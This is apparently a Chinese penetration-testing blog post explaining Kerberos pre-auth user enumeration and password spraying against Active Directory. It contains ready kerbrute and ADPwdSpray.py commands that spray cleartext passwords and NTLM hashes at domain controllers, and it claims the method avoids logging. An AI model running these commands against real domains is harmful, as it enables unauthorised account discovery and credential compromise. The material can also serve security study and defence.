适用场景与优点

适用于在域外对域用户进行用户枚举和爆破

使用Kerberos pre-auth bruteforcing的速度快,并且不会产生日志。
适用场景:

在没有域用户的口令,所以无法通过LDAP协议枚举出所有域用户,可以使用这种方式来验证用户是否存在

用户存在,抓包内容,这里借用三好师傅的图
域渗透之 pre-auth用户枚举

用户不存在,抓包内容如下

域渗透之 pre-auth用户枚举

用户枚举

https://github.com/ropnop/kerbrute

https://github.com/3gstudent/pyKerbrute

kerbrute_windows_amd64.exe userenum --dc 192.168.22.135 -d nncm 1.txt

域渗透之 pre-auth用户枚举

密码喷射

口令正确抓包如下

域渗透之 pre-auth用户枚举

口令错误抓包如下

域渗透之 pre-auth用户枚举

kerbrute_windows_amd64.exe passwordspray --dc 192.168.37.131 -d nncm user.txt xx110110.
//针对明文进行喷洒
python2 ADPwdSpray.py 10.1.1.1 hack.com user.txt clearpassword 123.com tcp

//针对哈希进行喷洒
python2 ADPwdSpray.py 10.1.1.1 hack.com user.txt ntlmhash afffeba176210fad4628f0524bfe1942 udp

域渗透之 pre-auth用户枚举

Reference

渗透技巧-通过Kerberos-pre-auth进行用户枚举和口令爆破

相关文章:

  • 2021-09-25
  • 2022-12-23
  • 2021-11-18
  • 2022-02-16
  • 2022-12-23
  • 2021-11-13
  • 2021-08-18
猜你喜欢
  • 2022-02-14
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-11-18
  • 2021-12-28
相关资源
相似解决方案